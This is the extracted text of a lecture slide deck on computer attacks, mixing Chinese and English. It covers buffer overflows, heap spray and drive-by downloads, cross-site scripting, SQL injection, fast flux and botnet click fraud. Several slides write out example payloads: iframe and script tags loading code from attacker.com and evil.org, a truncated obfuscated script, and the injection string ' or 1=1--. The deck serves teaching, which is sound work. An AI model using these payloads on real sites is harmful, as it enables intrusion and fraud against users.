Embed Size (px)
DESCRIPTION
一樣的程式 ( 城市 ), 不一樣的結局 許富皓 資訊工程學系 中央大學. How Fast Could Your Computer Be Comprised?. Based on the observation of an unpatched version of Windows 2000 or Windows XP located within a dial-in network of a German ISP . - PowerPoint PPT Presentation
Citation preview
1
一樣的程式 ( 城市 ), 不一樣的結局
許富皓資訊工程學系
中央大學
2
How Fast Could Your Computer Be Comprised? Based on the observation of an unpatched version of
Windows 2000 or Windows XP located within a dial-in network of a German ISP. Normally it takes only a couple of minutes before it is
successfully compromised. On average, the expected lifespan of the honeypot is less than
ten minutes. After this small amount of time, the honeypot is often successfully
exploited by automated malware. The shortest compromise time was only a few seconds:
Once we plugged the network cable in, an SDBot compromised the machine via an exploit against TCP port 135 and installed itself on the machine.
3
第一次網路大戰 (2008-12-12 讀者文摘 )愛沙尼亞是全歐洲網路化程度最高的國家,去年遭受空前的網路攻擊,背後主使者是誰?下一個遭殃的又會是誰?
超級電腦病毒“ Stuxnet”現蹤 伊朗核電廠是最終攻擊目標? (2010/09/24 20:15 鄭杰 綜合報導 , 中華電視公司 )
4
Stack Smashing Attacks
5
Principle of Stack Smashing Attacks Overwritten control transfer structures, such
as return addresses or function pointers, to redirect program execution flow to desired code.
Attack strings carry both code and address(es) of the code entry point.
6
A Linux Process Layout and Stack Operations
kernel address space
Libraries
heap
BSS
data
code
high address
low address
stack
main()
{ :
G(1);
}
void G(int a)
{
:
H(3);
}
void H(int c)
{
:
}
env, argv, argc
EIP
main
G
H
7
Explanation of BOAs (1)
b
return address add_g
address of G’s
frame point
C[0]
H’s stack
frame
G(int a)
{
H(3);
add_g:
}
H( int b)
{ char c[100];
int i=0;
while((c[i++]=getch())!=EOF)
{
}
}
C[99]
Input String: abc
c
b
a
G’s stack frame
0xabc
0xaba0xabb
i
ebp
esp
8
Explanation of BOAs (2)
b
return address add_g
address of G’s
frame point
C[0]
H’s stack
frame
addrress oxabc
G(int a)
{
H(3);
add_g:
}
H( int b)
{ char c[100];
int i=0;
while((c[i++]=getch())!=EOF)
{
}
}
C[99]
Injected Code0xabc
Attack String: xxInjected Codexy0xabc
Length=108 bytes
0xaba0xabb x
x
x
y
i
X : 1 byte
y : 4 bytes
ebp
esp
9
Injected Code: The attacked programs usually have root
privilege; therefore, the injected code is executed with root privilege.
The injected code is already in machine instruction form; therefore, a CPU can directly execute it. However the above fact also means that the injected
code must match the CPU type of the attacked host.
Usually the injected code will fork a shell; hence, after an attack, an attacker could have a root shell.
10
Memory Address Obfuscation/ASLR - Overview
code seg.
data seg.
heap seg.
stack seg.
code seg.
data seg.
heap seg.
stack seg.
code seg.
data seg.
heap seg.
stack seg.libraries
librarieslibraries
11
Heap Spray and Drive-by Download
12
Heap Spray Overview [Puttaraksa]
13
Mishandling Tag Attribute Values (2)[Julam]
<IFRAME SRC=file://BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB
::
BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB
NAME=“CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC:
CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC”></IFRAME>
14
Good web serverGood web serverVulnerable browserVulnerable browser
<iframe src=“http://attacker.com/bad.htm” height=0 width=0></iframe>
<script src=http://attacker.com/bad.js></script>
<iframe src=“http://attacker.com/bad.htm” height=0 width=0></iframe>
<script src=http://attacker.com/bad.js></script>
Malicious web serverMalicious web server
attacker.combad.htm
Client side WWW
15
Good web serverGood web serverVulnerable browserVulnerable browser
Malicious web serverMalicious web server
attacker.com
bad.htm
attacker2.com
document.write(unescape("%3C%73%63%72%69%70%74%20%6C%61%6E%67%75%61%67%65%3D%22%6A%61%76%61%73%63%72%69%70%74%22%3E%0D%0A%69%66%28%6E%61%76%69%67%61%74%6F%72%2E%75%73%65%72%41%67%65%6E%74%2E%74%6F%4C%6F%77%65%72%43%61%73%65%28%29%2E%69%6E%64%65%78%4F%66%28%22%5C%78%36%44%5C%78%37%33%5C%78% ………
document.write(unescape("%3C%73%63%72%69%70%74%20%6C%61%6E%67%75%61%67%65%3D%22%6A%61%76%61%73%63%72%69%70%74%22%3E%0D%0A%69%66%28%6E%61%76%69%67%61%74%6F%72%2E%75%73%65%72%41%67%65%6E%74%2E%74%6F%4C%6F%77%65%72%43%61%73%65%28%29%2E%69%6E%64%65%78%4F%66%28%22%5C%78%36%44%5C%78%37%33%5C%78% ………
Client side WWW
16
Cross-site Scripting
17
Cookie Delivery
18
Through Hyperlinks An attacker may be able to embed their malicious code within a hyperlink to
the target site. When the client web browser follows the link, the URL sent to trusted.org includes malicious code. The site (trusted.org) sends a page back to the browser including the value of criteria without validating user supplied input , which consequently forces the execution of code from the evil attackers’ server. For example; <A HREF="http://trusted.org/search.cgi?criteria=<SCRIPT
SRC='http://evil.org/badkama.js'></SCRIPT>"> Go to trusted.org </A>
In the attack above, one source is inserting code into pages sent by another source.
It should be noted that this attack: • disguises the link as a link to http://trusted.org, • can be easily included in an HTML email message, • does not supply the malicious code inline, but is downloaded from
http://evil.org. Thus the attacker retains control of the script and can update or remove the exploit code at anytime.
Web browser
trusted.org
19
SQL Injection [SK]
20
How Do You Test If It Is Vulnerable?
hi' or 1=1--
21
Web Application Input and Its Corresponding SQL Query
Take an asp page that will link you to another page with the following URL:
http://duck/index.asp?category=food
In the URL, 'category' is the variable name, and 'food' is the value assigned to the variable. In order to do that, an ASP might contain the following code:
v_cat = request("category")sqlstr="SELECT * FROM product
WHERE PCategory='" & v_cat & "'"set rs=conn.execute(sqlstr)
As we can see, our variable will be wrapped into v_cat and thus the SQL statement should become:
SELECT * FROM product WHERE PCategory='food'
The query should return a result set containing one or more rows that match the WHERE condition, in this case, 'food'.
22
Why ' or 1=1-- ? Now, assume that we change the URL into something like this:
http://duck/index.asp?category=food' or 1=1--
Now, our variable v_cat equals to "food' or 1=1-- ", if we substitute this in the SQL query, we will have:
SELECT * FROM product WHERE PCategory='food' or 1=1--'
The query now should now select everything from the product table regardless if PCategory is equal to 'food' or not. A double dash "--" tell MS SQL server ignore the rest of the query,
which will get rid of the last hanging single quote ('). Sometimes, it may be possible to replace double dash with single hash "#".
23
Fast Flux [Riden][SSAC]
24
DNS Resolution Sequence (1)
25
DNS Resolution Sequence (2)
root domain server
26
Web Request – Normal Network
27
Web Request – Fast Flux
28
DNS Resolution – Single Flux
29
DNS Resolution – Double Flux
30
DNS Resolution – Double Flux
31
Click Fraud
32
Google AdSense Abuse
A similar abuse is also possible with Google's AdSense program: AdSense offers companies the possibility to display
Google advertisements on their own website and earn money this way.
The company earns money due to clicks on these ads, for example per 10,000 clicks in one month.
An attacker can abuse this program by leveraging his botnet to click on these advertisements in an automated fashion and thus artificially increments the click counter.
This kind of usage for botnets is relatively uncommon, but not a bad idea from an attacker's perspective.
33
Loss Caused by Click Fraud [Catherine
Holahan]
On average, consultants estimate that between 14% and 15% of clicks are fraudulent.
34
Google Search Page
35
Google Search Result Page
36
Source HTML File of the Google Search Result Page
37
Ampersands (&'s) in URLs [Liam Quinn ]
Always use & in place of & when writing URLs in HTML:
E.g.: <a href="foo.cgi?
chapter=1&section=2&copy=3&lang=en">...</a>
38
Click Fraud (1) - Use the Browser’s URL Field
39
Click Fraud (2) – Connect to the Google Server Directly Attackers could launch the same attacks by
opening a HTTP connection to a Google server
and sending the URL in the previous slide to the
above server directly.
40
Click Fraud (3) - Use Fake Page (1)
41
Click Fraud (3) - Use Fake Page (2) [Mr. 東]
42
Click Fraud (3) - Use Fake Page (3)
